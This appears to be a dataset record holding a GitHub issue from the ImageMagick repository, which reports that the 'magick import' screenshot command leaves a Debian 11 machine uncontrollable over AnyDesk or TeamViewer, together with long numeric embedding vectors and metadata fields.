0.012268767692148685, 0.01567799039185047, -0.01995246298611164, -0.009710000827908516, -0.011581006459891796, 0.021209659054875374, 0.003856637980788946, 0.009732186794281006, 0.0063118706457316875, -0.03623686730861664, 0.007203001528978348, -0.006737099029123783, -0.017157046124339104, -0.011041151359677315, -0.015219483524560928, -0.017837412655353546, -0.009273679926991463, 0.012771646492183208, -0.029418418183922768, -0.0008310444536618888, -0.012483230791985989, -0.006274893879890442, 0.007691089995205402, 0.00908140279352665, 0.010272041894495487, 0.021520260721445084, -0.012268767692148685, 0.003148539923131466, -0.013170991092920303, 0.020514503121376038, -0.0010279437992721796, 0.003174423472955823, 0.012194815091788769, -0.010937617160379887, 0.015840686857700348, 0.008090434595942497, 0.017556391656398773, -0.015707572922110558, 0.011018965393304825, -0.013296711258590221, 0.0059421067126095295, 0.0003593643195927143, -0.009732186794281006, 0.0019505048403516412, -0.02751043625175953, -0.006093709729611874, -0.011862027458846569, -0.007883367128670216, -0.004740373697131872, -0.0005185939371585846, 0.006363637279719114, -0.021224450320005417, 0.007332419045269489, 0.018148014321923256, 0.020958220586180687, 0.006530031096190214, -0.014280283823609352, -0.008608104661107063, -0.014309864491224289, -0.013481593690812588, -0.017926156520843506, 0.016151288524270058, -0.009732186794281006, 0.005013999063521624, 0.05058370530605316, -0.0035959542728960514, 0.03540859371423721, 0.012505416758358479, -0.03783424571156502, -0.007964715361595154, 0.006385823246091604, -0.03949078917503357, 0.01740848645567894, -0.006918283179402351, -0.0046442351303994656, 0.012608950026333332, 0.004784745164215565, 0.0025236390065401793, 0.0035848612897098064, -0.027229417115449905, 0.002213037107139826, 0.013466802425682545, 0.015737153589725494, 0.000016523825252079405, -0.007639322895556688, -0.0011897154618054628, 0.0011536634992808104, 0.008674661628901958, -0.00959167629480362, -0.023694472387433052, -0.0358818918466568, -0.000343418272677809, -0.014524327591061592, -0.030202317982912064, -0.013762613758444786, -0.0058570606634020805, -0.01603296399116516, 0.0020355505403131247, 0.00936981849372387, -0.02088426798582077, -0.013178386725485325, 0.02137235552072525, 0.001226691878400743, -0.0218160729855299, 0.004381702747195959, 0.020632827654480934, 0.029462790116667747, -0.003403677139431238, -0.012608950026333332, 0.03401828184723854, -0.046057797968387604, 0.012520207092165947, 0.004237494897097349, 0.01398447249084711, -0.007898157462477684, 0.014457769691944122, 0.01177328359335661, 0.0012026572367176414, -0.0034813275560736656, 0.0007728066411800683, 0.010693573392927647, -0.010871060192584991, -0.008645080961287022, 0.012845599092543125, -0.00508795166388154, 0.007173420395702124, 0.0029987855814397335, -0.0020207599736750126, 0.008097830228507519, 0.008563732728362083, 0.0038344520144164562, 0.011765888892114162, 0.019848927855491638, -0.0074026742950081825, 0.022984527051448822, 0.007809414528310299, -0.01780783198773861, 0.042182669043540955, 0.0014106493908911943, 0.013540755957365036, 0.003754952922463417, 0.002580952364951372, -0.008556338027119637, -0.016047755256295204, 0.014620466157793999, -0.016269613057374954, -0.0014060273533686996, -0.021032173186540604, -0.007912948727607727, 0.0005449395976029336, 0.017970526590943336, 0.011714121326804161, 0.012461044825613499, -0.011233428493142128, 0.001381992711685598, 0.012793832458555698, -0.014465165324509144, -0.010427342727780342, -0.0005495616351254284, 0.008467594161629677, 0.015027206391096115, -0.028057686984539032, -0.004389097914099693, -0.00758016062900424, -0.029581114649772644, -0.02390154078602791, 0.0093032605946064, -0.027037139981985092, -0.011743702925741673, 0.016328776255249977, 0.0038677307311445475, -0.004185727797448635, -0.01825154758989811, -0.010893245227634907, -0.015367389656603336, 0.007868576794862747, 0.024774184450507164, -0.0040784962475299835, -0.00834926962852478, 0.010937617160379887, -0.0029544138815253973, -0.015367389656603336, 0.009414189495146275, -0.013843961991369724, 0.0002525949967093766, -0.00043239269871264696, -0.0011083674617111683, -0.004156146664172411, -0.001645449548959732, -0.0332195907831192, 0.0013108131242915988, -0.023753635585308075, -0.014864510856568813, 0.032125089317560196, -0.0016824259655550122, -0.030291061848402023, -0.000016639376553939655, -0.005698062479496002, 0.015108554624021053, 0.00042684623622335494, -0.008822567760944366, 0.015108554624021053, -0.02354656718671322, -0.03449157997965813, -0.0010806351201608777, -0.02356135845184326, 0.014221121557056904, -0.0007728066411800683, 0.007661508861929178, 0.015189902856945992, 0.0027085209731012583, 0.0015372935449704528, -0.006034547463059425, -0.004533305764198303, -0.00936981849372387, -0.00419682078063488, -0.022851411253213882, -0.015293436124920845, -0.0022629552986472845, -0.010042788460850716, -0.01629919372498989, -0.004226401913911104, -0.013015690259635448, -0.006086314562708139, -0.011203847825527191, -0.0002525949967093766, -0.002762136748060584, 0.019671441987156868, -0.02387196011841297, 0.002863821806386113, -0.011832445859909058, -0.014546513557434082, 0.002396070398390293, -0.0027991130482405424, 0.006086314562708139, 0.01758597232401371, -0.00023849774152040482, 0.007912948727607727, -0.011299986392259598, -0.004463050980120897, 0.012564579024910927, -0.008408431895077229, 0.017349323257803917, -0.001920923707075417, -0.0060641285963356495, -0.004688606597483158, 0.004096984397619963, -0.012986109592020512, 0.015973802655935287, 0.008053458295762539, -0.007883367128670216, -0.01110770832747221, -0.009266284294426441, -0.029048655182123184, 0.006796261295676231, 0.0010353390825912356, -0.007018119562417269, -0.00020995658996980637, 0.022052722051739693, 0.027007557451725006, 0.0009040728327818215, -0.0020244575571268797, -0.008193968795239925, 0.0030634943395853043, 0.008889124728739262, 0.007520998362451792, 0.01235751062631607, -0.011706726625561714, 0.019656650722026825, -0.008230945095419884, 0.017023932188749313, 0.009576885960996151, 0.014857115224003792, 0.0036754535976797342, -0.0030135761480778456, 0.028442243114113808, 0.005295019596815109, -0.023265548050403595, -0.006263801362365484, 0.010671387426555157, -0.017023932188749313, 0.015234274789690971, 0.021890025585889816, 0.008792986162006855, -0.00019146839622408152, 0.007883367128670216, -0.016802072525024414, -0.004718187730759382, 0.003540489822626114, -0.019789766520261765, -0.017290161922574043, 0.013770009391009808, -0.023443033918738365, 0.02822038345038891, 0.004891976714134216, 0.01581110619008541, -0.006873911712318659, 0.006733401212841272, 0.0034850251395255327, -0.0222597885876894, 0.012327929958701134, 0.015093764290213585, 0.011018965393304825, 0.003287201514467597, 0.007262163795530796, -0.002595742931589484, -0.009754372760653496, -0.017733879387378693, 0.021756909787654877, 0.019671441987156868, 0.011085523292422295, 0.0032021556980907917, 0.020544083788990974, 0.011100313626229763, -0.0013764462200924754, -0.006082616746425629, 0.005176695063710213, 0.01900586672127247, -0.0021834559738636017, 0.02573557011783123, -0.013037876226007938, 0.033722471445798874, 0.006988538429141045, 0.011662354692816734, -0.01834029145538807, 0.001112989499233663, -0.008149596862494946, 0.0052321599796414375, -0.006474566645920277, 0.00654482189565897, -0.006888702046126127, 0.011788074858486652, -0.025528501719236374, 0.0035774661228060722, -0.005198881030082703, 0.0032594690565019846, -0.02631240151822567, -0.00990227796137333, -0.0010787863284349442, -0.00045272972784005105, -0.0004404812934808433, -0.02382758818566799, 0.0018294070614501834, 0.009495537728071213, -0.008423222228884697, 0.006896097678691149, -0.022807039320468903, -0.00039772732998244464, -0.02475939318537712, 0.01905023865401745, -0.02381279692053795, 0.018355082720518112, 0.00839364156126976, -0.009961440227925777, -0.01758597232401371, -0.025676408782601357, 0.003573768539354205, 0.022452065721154213, 0.014679628424346447, -0.003912102431058884, -0.0040674032643437386, -0.007358302362263203, -0.015589247457683086, 0.0068147494457662106, 0.01055306289345026, 0.001015002024360001, -0.0023757333401590586, -0.01555966679006815, -0.0009022240410558879, -0.007905553095042706, 0.0055723427794873714, -0.017704296857118607, -0.0032409809064120054, -0.014635256491601467, 0.005908827763050795, 0.009724792093038559, 0.0069774454459548, 0.008829962462186813, -0.020055996254086494, -0.00745813874527812, 0.005768317263573408, 0.0033796424977481365, -0.007025514729321003, -0.004429772030562162, 0.0003750793111976236, -0.004437167197465897, -0.02742169424891472, -0.00048485296429134905, 0.012483230791985989, -0.00042522852891124785, 0.0024552326649427414, 0.024286095052957535, -0.00539855333045125, -0.003754952922463417, 0.01603296399116516, 0.004751466680318117, 0.02365010231733322, 0.028693681582808495, -0.016328776255249977, -0.006626169662922621, -0.02017432078719139, 0.003189214039593935, 0.014139773324131966, -0.010745340026915073, -0.0067629823461174965, -0.002192700281739235, 0.0179409459233284, 0.00030805959249846637, 0.006881306879222393, -0.020736360922455788, -0.017970526590943336, -0.008852148428559303, -0.0009623106452636421, -0.007247373461723328, -0.0019782371819019318, 0.020470131188631058, 0.00046104940702207386, 0.02823517471551895, -0.015234274789690971, -0.010730549693107605, 0.000026995656298822723, 0.007424859795719385, -0.004707094747573137, 0.002453383756801486, 0.013274525292217731, 0.008290107361972332, 0.008741219528019428, 0.011765888892114162, -0.010767525993287563, -0.021298402920365334, 0.02363531105220318, 0.028530985116958618, 0.006648355629295111, -0.02542496845126152, 0.0093032605946064, -0.008800381794571877, 0.007450743578374386, 0.011203847825527191, -0.007265861611813307, -0.017438067123293877, -0.00803866796195507, -0.008467594161629677, -0.006322963163256645, -0.011181661859154701, 0.006844330579042435, -0.011728912591934204, 0.000031227718864101917, -0.009007449261844158, -0.01273467019200325, 0.006988538429141045, 0.0030098785646259785, 0.0017998259281739593, 0.010686177760362625, 0.015530085191130638, 0.00004980258017894812, -0.004562886897474527, 0.0054762037470936775, -0.01024246122688055, -0.0009641594951972365, 0.00045873838826082647, 0.02008557692170143, 0.00479583814740181, -0.013880938291549683, 0.02092863991856575, 0.004525910597294569, -0.013385454192757607, 0.003318631323054433, 0.005871851462870836, -0.006737099029123783, 0.00671121571213007, -0.0003822434809990227, -0.018547359853982925, 0.00037022613105364144, -0.008556338027119637, -0.013267130590975285, 0.0020170623902231455, 0.01581110619008541, -0.00837145559489727, -0.00010255171946482733, -0.006899795029312372, -0.021357566118240356, 0.014997625723481178, -0.005786805879324675, -0.0065670073963701725, 0.018887542188167572, 0.004551793914288282, -0.003560826648026705, 0.014997625723481178, 0.007772438228130341, 0.001105594215914607, 0.016935188323259354, 0.0036292329896241426, 0.020736360922455788, -0.01612170785665512, 0.019671441987156868, 0.0006068750517442822, -0.004640537314116955, 0.0186065211892128, 0.028368288651108742, 0.01798531785607338, 0.005668481346219778, -0.015219483524560928, -0.006496752612292767, 0.024596696719527245, 0.01933125965297222, 0.012571973726153374, 0.02110612578690052, -0.0027122185565531254, 0.004936348646879196, -0.005039882380515337, -0.011373938992619514, -0.008630290627479553, -0.0076467180624604225, -0.02066240832209587, -0.0050361850298941135, -0.00014547900354955345, -0.01093022245913744, -0.0047884429804980755, -0.003573768539354205, 0.013185782358050346, 0.014139773324131966, -0.0007469231495633721, -0.0031411447562277317, -0.00616766232997179, -0.015278645791113377, 0.011203847825527191, 0.015175112523138523, 0.008630290627479553, 0.00012259985669516027, 0.0013718241825699806, 0.011980351991951466, 0.015707572922110558, -0.002166816731914878, -0.020381389185786247, -0.004215308930724859, 0.01148486789315939, -0.01308964379131794, -0.0036810000892728567, 0.0006225900142453611, 0.009103587828576565, 0.006585495546460152, -0.0012488777283579111, 0.004714490380138159, -0.0037660456728190184, 0.008489780128002167, -0.005021394230425358, 0.0005042655975557864, -0.02498125098645687, 0.01873963698744774, 0.02092863991856575, -0.0032224927563220263, 0.014332050457596779, 0.0061158956959843636, -0.02106175385415554, 0.024434000253677368, -0.01780783198773861, 0.00326131796464324, 0.006134383846074343, -0.015293436124920845, -0.008023877628147602, -0.018103642389178276, 0.0032409809064120054, 0.026060963049530983, 0.004873488564044237, 0.0004053537268191576, 0.0093032605946064, -0.016861235722899437, 0.005439227446913719, -0.004636839963495731, -0.003997148014605045, -0.012816018424928188, 0.002653056290000677, -0.010456924326717854, 0.02422693371772766, -0.011869422160089016, -0.014435584656894207, 0.0013071155408397317, 0.01399926282465458, -0.0073287212289869785, -0.005380065180361271, 0.0012146745575591922, 0.009473351761698723, 0.0008291956619359553, 0.02323596552014351, -0.006267498712986708, 0.006973748095333576, 0.0012784588616341352, -0.015034602023661137, 0.01700914092361927, 0.0010556760244071484, 0.0027085209731012583, -0.01233532465994358, 0.010079764761030674, -0.02356135845184326, 0.021254030987620354, -0.013060062192380428, 0.012276162393391132, -0.00018095322593580931, -0.02885637804865837, -0.0019431095570325851, 0.010996779426932335, 0.015382179990410805, 0.0075875562615692616, 0.015618829056620598, -0.0018294070614501834, 0.01050869096070528, -0.0033352707978338003, 0.0032982942648231983, 0.033190011978149414, -0.009968835860490799, -0.0071327462792396545, -0.01458348985761404, -0.005849665496498346, -0.0025606153067201376, -0.014790557324886322, -0.00589773477986455, -0.01520469319075346, -0.010294227860867977, 0.028826797381043434, 0.006019757129251957, -0.0024811159819364548, 0.010035393759608269, -0.013991867192089558, -0.00908140279352665, -0.021742120385169983, -0.010309018194675446, 0.0261349156498909, -0.005461413413286209, -0.00434102863073349, -0.016728119924664497, 0.011447891592979431, 0.004063705913722515, -0.01451693195849657, 0.014258097857236862, 0.00047653328510932624, 0.010567853227257729, -0.004947441630065441, 0.025750361382961273, 0.02039617858827114, 0.01057524885982275, -0.008193968795239925, 0.010493900626897812, 0.007809414528310299, 0.008149596862494946, -0.0013644288992509246, 0.007406371645629406, 0.008563732728362083, -0.0055390638299286366, -0.000226480420678854, -0.012941737659275532, 0.028087269514799118, 0.017171837389469147, 0.007073584012687206, -0.01847340725362301, 0.004906767513602972, -0.008889124728739262, 0.0014365329407155514, 0.0022444671485573053, 0.0075468821451067924, -0.0010621469700708985, 0.01420633029192686, -0.0038677307311445475, 0.01560403872281313, -0.005265438463538885, 0.023724054917693138, -0.007221489679068327, 0.012512811459600925, 0.010027998127043247, -0.006951562128961086, -0.009162750095129013, -0.008001691661775112, 0.02524748258292675, -0.006400613579899073, 0.0031836675480008125, -0.0034443510230630636, 0.0096360482275486, 0.006441287696361542, 0.019715813919901848, -0.0032150973565876484, -0.015064182691276073, 0.014339445158839226, -0.0016204904532060027, 0.014139773324131966, -0.0053430888801813126, 0.011292590759694576, 0.004189425613731146, 0.00026784776127897203, -0.016106916591525078, 0.0010279437992721796, 0.020736360922455788, 0.0014559455448761582, 0.01585547812283039, 0.010560458526015282, -0.0065670073963701725, -0.008792986162006855, 0.0024441396817564964, -0.0036699071060866117, -0.000536157691385597, -0.0017554543446749449, 0.009332842193543911, -0.004570282530039549, 0.015308227390050888, -0.005184090230613947, -0.010612225160002708, 0.003083831164985895, 0.00894828699529171, -0.02079552412033081, 0.0071549322456121445, -0.004832814913243055, 0.009096193127334118, 0.0254693403840065, 0.008260526694357395, 0.008955682627856731, -0.0019837834406644106, 0.022363323718309402, 0.010434738360345364, 0.016151288524270058, 0.022422485053539276, 0.014102797023952007, 0.014716604724526405, -0.00014062585250940174, -0.013777404092252254, -0.003915800247341394, 0.0024034655652940273, -0.0089704729616642, -0.008593314327299595, -0.007861181162297726, -0.0005153584643267095, -0.0016417518490925431, -0.01621045172214508, 0.019582698121666908, -0.007898157462477684, 0.0007862105849198997, 0.019834138453006744, -0.008245735429227352, 0.003392584156244993, 0.0009724791743792593, 0.008068249560892582, 0.010826688259840012, 0.008881730027496815, -0.0010510539868846536, -0.024152981117367744, 0.0065781003795564175, 0.00040003834874369204, -0.002653056290000677, -0.00997623149305582, 0.005368972197175026, 0.008844753727316856, -0.0032224927563220263, -0.0013940100325271487, -0.017290161922574043, 0.014590885490179062, -0.01718662865459919, 0.004440865013748407, 0.005513180512934923, 0.0017868842696771026, -0.025972219184041023, 0.010538272559642792, -0.01955311745405197, 0.012594159692525864, -0.017571182921528816, 0.0040674032643437386, 0.0002247471420560032, -0.008837358094751835, -0.014576094225049019, -0.011958166025578976, 0.021446308121085167, 0.012564579024910927, 0.0013958588242530823, -0.005812689196318388, 0.005916222929954529, 0.0041006822139024734, 0.016757702454924583, 0.010893245227634907, -0.011410915292799473, -0.02203793078660965, 0.026770908385515213, 0.002823147689923644, -0.0074026742950081825, -0.011410915292799473, 0.008903915993869305, 0.0049955109134316444, -0.004074798431247473, 0.013888333924114704, -0.0018441976280882955, 0.009207122027873993, 0.014738790690898895, -0.013777404092252254, 0.010856268927454948, 0.0013570336159318686, 0.0030413083732128143, 0.0008781893411651254, 0.006607681512832642, 0.017216209322214127, -0.04150230437517166, 0.0031836675480008125, 0.007972110994160175, 0.004056310281157494, 0.052062761038541794, -0.007310233078896999, 0.019760185852646828, 0.008534152060747147, -0.015929430723190308, -0.00781681016087532, 0.008267921395599842, -0.015707572922110558, -0.005975385196506977, -0.032480064779520035, -0.006677936762571335, 0.008504570461809635, 0.0004109001893084496, -0.00590143259614706, 0.006603984162211418, -0.01396228652447462, 0.0027565902564674616, -0.009355027228593826, -0.013459407724440098, -0.008593314327299595, -0.011004175059497356, 0.006692727096378803, -0.02230416052043438, 0.01896149478852749, 0.013636894524097443, -0.007058793678879738, 0.012253977358341217, -0.003926893230527639, -0.007025514729321003, -0.0021982465405017138, -0.0064338925294578075, 0.01178067922592163, 0.01152923982590437, 0.00020094358478672802, -0.004244890064001083, 0.023457825183868408, -0.002373884432017803, 0.01585547812283039, 0.015426551923155785, -0.013134014792740345, -0.0074618360958993435, 0.006907190196216106, -0.003819661447778344, -0.004270773380994797, -0.00469600223004818, 0.016639377921819687, 0.015396970324218273, -0.007158630061894655, -0.004677513614296913, 0.010493900626897812, -0.0033981306478381157, 0.0017924306448549032, 0.0008250357932411134, 0.013134014792740345, -0.002115049632266164, 0.005383762996643782, -0.011758493259549141, -0.00731393089517951, 0.010375576093792915, -0.01429507415741682, -0.020810315385460854, -0.006215731613337994, 0.0014698116574436426, 0.007310233078896999, -0.0007631003390997648, 0.01807406172156334, 0.0066520534455776215, 0.011078127659857273, 0.01306745782494545, -0.014968044124543667, -0.007986901327967644, 0.00030713516753166914, -0.008696847595274448, -0.013718241825699806, -0.004300354514271021, -0.01959748938679695, -0.015870267525315285, -0.0018931913655251265, -0.015382179990410805, -0.009236703626811504, 0.020632827654480934, -0.014842324890196323, 0.016225241124629974, 0.0007778909057378769, -0.01740848645567894, -0.009244098328053951, 0.004573979880660772, -0.00262717274017632, -0.010323809459805489, 0.018088851124048233, 0.0006392294308170676, -0.015278645791113377, -0.001257197349332273, -0.015337808057665825, -0.007069886662065983, -0.02555808424949646, -0.034550741314888, -0.0003850166976917535, 0.014783162623643875, 0.006955259945243597, 0.0007159554515965283, -0.001762849627994001, -0.009532514028251171, 0.027185045182704926, 0.0040784962475299835, 0.004647932946681976, 0.009473351761698723, 0.009717396460473537, 0.01342243142426014, 0.005764619912952185, 0.028116850182414055, 0.0033685495145618916, -0.000015194987099675927, -0.0011009721783921123, -0.0034850251395255327, 0.02199355885386467, -0.004718187730759382, 0.008120016194880009, 0.008009087294340134, 0.014324654825031757, -0.012416672892868519, 0.026770908385515213, -0.00003151659984723665, -0.01905023865401745, 0.013533360324800014, 0.01612170785665512, 0.0068258424289524555, -0.02591305784881115, -0.0029599603731185198, 0.02823517471551895, 0.002018911065533757, 0.0036976393312215805, -0.001891342573799193, -0.008689452894032001, 0.015574457123875618, 0.033012524247169495, 0.01308964379131794, 0.006367335096001625, -0.006507845129817724, -0.015825897455215454, -0.011203847825527191, 0.024152981117367744, -0.008933496661484241, -0.013770009391009808, -0.021919606253504753, -0.0031559353228658438, 0.018044481053948402, -0.0011675296118482947, -0.010981989093124866, -0.015825897455215454, -0.005198881030082703, 0.013407640159130096, 0.019168563187122345, 0.017556391656398773, -0.013200572691857815, 0.010826688259840012, 0.002144630765542388, 0.012949133291840553, 0.02823517471551895, 0.00781681016087532, -0.005601923912763596, 0.008497175760567188, 0.01625482365489006, -0.020899057388305664, -0.003475781064480543, -0.007047700695693493, 0.01337805949151516, -0.01949395425617695, 0.013097038492560387, 0.0015298982616513968, 0.009857906959950924, -0.0029340768232941628, -0.00525434548035264, 0.014147168025374413, 0.021490680053830147, 0.009894883260130882, 0.008408431895077229, 0.006385823246091604, 0.003612593747675419, 0.0019375630654394627, -0.005136020947247744, 0.01491627749055624, -0.02172732912003994, 0.013511174358427525, 0.029891716316342354, -0.011189056560397148, 0.005073161330074072, -0.007661508861929178, 0.004869791213423014, -0.01678728312253952, -0.0006064128829166293, -0.0012350116157904267, 0.024345258250832558, -0.014620466157793999, -0.012616345658898354, 0.0031041682232171297, 0.0020706781651824713, 0.002170514315366745, 0.0025162436068058014, 0.013119224458932877, 0.003388886572793126, -0.02319159358739853, -0.006611379329115152, 0.027850620448589325 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-7 ### Operating system Linux ### Operating system, version and so on Debian 11 ### Description By using AnyDesk or Teamviewer, when I run "magick import poop.jpg", I can't control any more the computer. I can't use mouse to select the area and there is no key that cancel the operation. So... I need a presence to make that area selection to continue using that computer. Explanation: I have a hotkey that runs "magick import" and some other commands to copy that captured area to clipboard. I use this every time. Sometimes, I use my computer from my girlfriend house. And it happened to me several times that I press that hotkey... and I need to call somebody to go to my computer to complete the action, for me to continue using the computer. ### Steps to Reproduce - Run AnyDesk or Teamviewer to control a computer. - Run "magick import file.jpg" in that computer. - Cry. ### Images _No response_
"import" command doesn't allow AnyDesk or Teamviewer to control computer.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6285/comments
2
2023-04-26T13:21:21
2023-05-02T22:24:09Z
https://github.com/ImageMagick/ImageMagick/issues/6285
1,685,022,922
6,285
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : "import" command doesn't allow AnyDesk or Teamviewer to control computer. Issue date: --- start body --- ### ImageMagick version 7.1.1-7 ### Operating system Linux ### Operating system, version and so on Debian 11 ### Description By using AnyDesk or Teamviewer, when I run "magick import poop.jpg", I can't control any more the computer. I can't use mouse to select the area and there is no key that cancel the operation. So... I need a presence to make that area selection to continue using that computer. Explanation: I have a hotkey that runs "magick import" and some other commands to copy that captured area to clipboard. I use this every time. Sometimes, I use my computer from my girlfriend house. And it happened to me several times that I press that hotkey... and I need to call somebody to go to my computer to complete the action, for me to continue using the computer. ### Steps to Reproduce - Run AnyDesk or Teamviewer to control a computer. - Run "magick import file.jpg" in that computer. - Cry. ### Images _No response_ --- end body ---
1,139
[ -0.027387265115976334, 0.0029789588879793882, -0.007026894949376583, 0.002371672773733735, 0.021793335676193237, 0.0047586713917553425, -0.010567162185907364, 0.04355601966381073, -0.01811513490974903, 0.03212294727563858, 0.0031992678996175528, 0.019601741805672646, -0.010452218353748322, -0.03865175321698189, 0.012789408676326275, 0.017149608582258224, -0.02016879804432392, 0.0391421802341938, -0.06182441487908363, -0.018421651795506477, -0.003385093528777361, -0.013800913468003273, -0.02148681879043579, 0.047295521944761276, 0.006406198721379042, 0.019846955314278603, -0.026728253811597824, 0.018866101279854774, -0.016843091696500778, -0.03331836313009262, 0.0011398588540032506, 0.017686013132333755, 0.011525027453899384, 0.01923392154276371, 0.038437191396951675, -0.00002010018943110481, -0.014697474427521229, 0.05253695696592331, 0.0054598283022642136, 0.02623782679438591, -0.01895805634558201, -0.024689918383955956, -0.012781745754182339, 0.014459923841059208, -0.05391628295183182, 0.0003580019110813737, -0.03702721372246742, -0.018866101279854774, -0.029165061190724373, 0.03580114617943764, 0.05275151878595352, -0.025931309908628464, -0.0480005107820034, -0.007467512506991625, 0.03485094755887985, 0.005095839966088533, 0.043126896023750305, -0.053701721131801605, -0.015402463264763355, -0.005352547392249107, -0.011548016220331192, 0.04922657832503319, 0.007659085560590029, 0.003252908121794462, -0.02524164877831936, -0.02300407737493515, -0.027279984205961227, 0.01911131478846073, -0.01950978673994541, -0.0029310656245797873, -0.00849817506968975, -0.011509701609611511, 0.01963239349424839, -0.025011761114001274, 0.011463724076747894, -0.01033727452158928, 0.036046359688043594, -0.0012864121235907078, 0.005731862038373947, 0.015586373396217823, -0.05848338082432747, 0.02340254746377468, -0.04447557032108307, 0.01797720231115818, 0.05014612898230553, -0.038437191396951675, -0.022437021136283875, -0.07926521450281143, -0.027540523558855057, 0.038437191396951675, 0.004229930229485035, 0.026712927967309952, 0.00852116383612156, -0.01897338218986988, 0.023540480062365532, -0.025486862286925316, 0.004072840325534344, -0.02168605476617813, -0.03629157319664955, 0.0005929181934334338, 0.03693525865674019, -0.03990847244858742, -0.031755127012729645, -0.033287711441516876, -0.017946550622582436, 0.012574846856296062, -0.0064483447931706905, -0.058299470692873, 0.02763247862458229, 0.1160472109913826, -0.022053875029087067, -0.01989293284714222, 0.00978554505854845, -0.008590130135416985, -0.017486777156591415, 0.033011846244335175, 0.007268276531249285, 0.02398492954671383, -0.04974765703082085, 0.0006317117367871106, -0.012674464844167233, -0.008651433512568474, 0.004095829091966152, 0.019800977781414986, -0.0383145846426487, 0.04076671972870827, -0.029640162363648415, 0.021640077233314514, -0.0075019956566393375, -0.010881341993808746, -0.019050011411309242, -0.0004269681521691382, 0.01652124896645546, 0.014812418259680271, -0.021440841257572174, -0.00613033352419734, -0.015954192727804184, 0.013042284175753593, -0.04328015446662903, 0.007183984387665987, -0.04928788170218468, -0.02723400667309761, -0.04275907576084137, 0.03252141922712326, -0.03984716907143593, 0.017302867025136948, -0.025870008394122124, -0.0257167499512434, -0.020843133330345154, 0.014628508128225803, -0.00642918748781085, -0.019540438428521156, -0.007513490039855242, -0.0009320022654719651, 0.03788546100258827, -0.02478187344968319, 0.028383444994688034, 0.016628529876470566, -0.030820252373814583, -0.033686183393001556, -0.012751094065606594, -0.04165561497211456, 0.024276120588183403, 0.0014185975305736065, 0.04282037913799286, -0.037119168788194656, -0.017164934426546097, -0.008843006566166878, -0.007475175429135561, 0.011586329899728298, -0.04064411297440529, -0.01031428575515747, 0.009172511287033558, -0.01745612546801567, -0.009739567525684834, 0.017364170402288437, -0.026912163943052292, 0.005275918170809746, -0.020797155797481537, -0.044383615255355835, -0.005720367655158043, 0.0018189848633483052, -0.03157121688127518, 0.016889069229364395, 0.07301227003335953, -0.0192952249199152, 0.006762524135410786, -0.0062529402785003185, 0.007115018554031849, -0.021793335676193237, 0.01295032911002636, -0.007651422638446093, 0.03497355431318283, -0.04288168251514435, 0.02849072590470314, 0.026268478482961655, -0.01917261816561222, -0.016935046762228012, 0.03521876782178879, -0.03236816078424454, 0.0002567077171988785, -0.004383188672363758, -0.02868996001780033, -0.04796985909342766, -0.012881363742053509, 0.002917655510827899, -0.03196968883275986, 0.009180174209177494, 0.021640077233314514, -0.023371895775198936, 0.0254408847540617, -0.05897380784153938, 0.0092874551191926, -0.01612277701497078, -0.05477453023195267, -0.010659117251634598, 0.013295160606503487, 0.013057610020041466, -0.03052906133234501, 0.024705244228243828, 0.005252929404377937, -0.0018802882404997945, -0.008781703189015388, -0.026207175105810165, -0.012475228868424892, 0.000512936501763761, 0.002733745612204075, 0.00436019990593195, -0.001212656614370644, -0.003296969924122095, 0.0037299247924238443, 0.013617003336548805, 0.007812344003468752, 0.01751742884516716, -0.021333560347557068, 0.007877478376030922, 0.01969369687139988, 0.011364106088876724, 0.013494396582245827, -0.0019339286955073476, 0.052567608654499054, 0.021594099700450897, -0.011754914186894894, -0.002273970516398549, 0.04196213185787201, 0.005249097943305969, 0.02312668412923813, 0.011019274592399597, -0.026483040302991867, -0.0311420951038599, 0.013019295409321785, 0.028122905641794205, -0.021517470479011536, -0.026789557188749313, 0.006846816278994083, -0.023371895775198936, -0.0017289456445723772, -0.012697453610599041, 0.0014607434859499335, -0.005636075511574745, 0.024337423965334892, 0.015578710474073887, -0.0383145846426487, 0.02254430204629898, 0.04288168251514435, -0.032214902341365814, -0.012015453539788723, -0.015831585973501205, 0.017333518713712692, 0.007486669812351465, -0.02695814147591591, -0.02643706277012825, -0.005597760900855064, -0.050789814442396164, -0.03623026981949806, -0.008942623622715473, -0.0036935259122401476, 0.04024564102292061, 0.058391425758600235, -0.02009216882288456, -0.021578773856163025, -0.0013534626923501492, -0.03905022516846657, 0.019402505829930305, -0.005819985177367926, 0.016689833253622055, 0.025195671245455742, -0.022314414381980896, -0.05005417391657829, 0.008145680651068687, -0.023310592398047447, 0.033686183393001556, 0.00025407358771190047, 0.014390957541763783, 0.048337679356336594, 0.01282006036490202, -0.017027001827955246, 0.033808790147304535, -0.03478964418172836, -0.0013343053869903088, 0.009777882136404514, -0.016643855720758438, -0.007992422208189964, 0.013394778594374657, -0.010789386928081512, 0.025103716179728508, 0.007827669382095337, 0.04726487025618553, 0.002517268294468522, -0.02167072892189026, 0.023433199152350426, -0.033808790147304535, 0.012628487311303616, -0.0009042241727001965, -0.033349014818668365, 0.03157121688127518, 0.0060537043027579784, -0.020122820511460304, 0.029456252232193947, 0.0035230261273682117, 0.019279899075627327, -0.013693632557988167, -0.03184708207845688, 0.012697453610599041, 0.02424546889960766, -0.021103672683238983, -0.04036824777722359, -0.001584308105520904, -0.025594143196940422, -0.009716578759253025, -0.018145786598324776, -0.02703477069735527, -0.017302867025136948, -0.028337467461824417, 0.010367926210165024, -0.04245255887508392, 0.003153290366753936, 0.013502059504389763, 0.014459923841059208, 0.02226843684911728, -0.033349014818668365, -0.009616960771381855, 0.009678264148533344, -0.01875882036983967, 0.03230685740709305, -0.012030779384076595, 0.013440756127238274, 0.0371498204767704, 0.03377813845872879, -0.004440660122781992, 0.0010766398627310991, 0.0033237901516258717, -0.02088911086320877, 0.027525197714567184, 0.012444577179849148, -0.007295096758753061, -0.021180301904678345, -0.046621184796094894, -0.025272300466895103, 0.003950233571231365, 0.016827765852212906, -0.047693993896245956, 0.0014913951745256782, 0.007854489609599113, -0.02082780748605728, 0.04665183648467064, -0.04514990746974945, -0.0491652749478817, -0.02465926669538021, -0.001909982063807547, 0.011103566735982895, 0.006038378458470106, -0.0182990450412035, 0.02835279330611229, -0.007655254099518061, -0.006881299428641796, -0.01931055076420307, -0.019448483362793922, -0.016827765852212906, 0.005007716361433268, -0.05082046613097191, -0.0006877467967569828, 0.014429272152483463, -0.015846911817789078, 0.024567311629652977, 